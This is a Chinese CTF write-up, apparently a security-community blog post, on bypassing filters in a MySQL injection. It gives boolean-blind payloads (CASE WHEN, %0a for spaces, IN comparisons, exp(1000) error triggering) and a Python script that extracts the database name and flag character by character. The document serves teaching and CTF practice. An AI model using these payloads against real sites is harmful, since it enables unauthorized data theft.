实战|记一次MySQL注入绕过

作者：末初编辑：白帽子社区

SQL注入类型判断

某朋友比赛中让帮忙看的一道题目，如下

查看源码发现提示

存在过滤且，limit参数只能为单个数字 fuzz一下sql注入关键字看看都过滤了哪些字符

直接在class参数插入exp(100)回显正常，插入exp(1000)发现返回database error；说明此处sql注入可直接插入执行，其次如果sql语句执行错误会返回报错提示；

绕过

那么就可以做布尔盲注了，但是比较棘手的是过滤了逗号,；不能使用if进行条件判断；绕过逗号的方法from x for y不能在if中使用。 if无法使用可以用case when [express] then [x] else [y] end代替空格绕过可以使用括号()或者%0a=、like、regexp被过滤可以用in(不过in对字符大小写不敏感)

class=case%0awhen%0a(2)in(1)%0athen%0aexp(1000)else%0a1%0aend&limit=4

利用脚本编写

from urllib.parse import urlencodefrom urllib.parse import unquoteimport requests
burp0_url = "http://123.60.32.152:80/"burp0_headers = {"Content-Type": "application/x-www-form-urlencoded"}all_str = "0123456789abcdefghijklmnopqrstuvwxyz!\"#$%&\\'()*+,-./:;<=>?@[\\]^_`{|}~"
flag = ''for leng in range(1,50):for char in all_str:    payload = "case%0awhen%0amid(database()from({})for(1))%0ain%0a(0x{})%0athen%0aexp(1000)%0aelse%0a1%0aend".format(leng, hex(ord(char))[2:])#payload = "case%0awhen%0amid((select%0aflag%0afrom%0aflag)from({})for(1))%0ain%0a(0x{})%0athen%0aexp(1000)%0aelse%0a1%0aend".format(leng, hex(ord(char))[2:])    burp0_data = {"class": unquote(payload), "limit": "4"}    resp = requests.post(burp0_url, headers=burp0_headers, data=urlencode(burp0_data))if 'error' in resp.text:      flag += charprint(flag)else:continue# print(resp.text)# print(resp.request.body)

到数据名称：babysql 直接按照前面的提示查flag

加个好友

推荐阅读

欢迎在看丨留言丨分享至朋友圈 三连


 好文推荐  


    

2022年6月|零基础+进阶系统化渗透测试工程师+CTF网络安全大赛学习指南
内推 | 2022年HVV招聘
打穿靶机需要的技能和思路
2022HW必备|最全应急响应思维导图
实战|后台getshell+提权一把梭
一款图形化红队渗透工具
红队快速打点工具



    
实战|记一次艰难的外网打点
一个红队知识仓库
实战|记一次文件上传绕过
常见漏洞安全攻防知识库
红队信息搜集工具（附下载地址）
实战—某医院管理系统Getshell
CobaltStrike上线Linux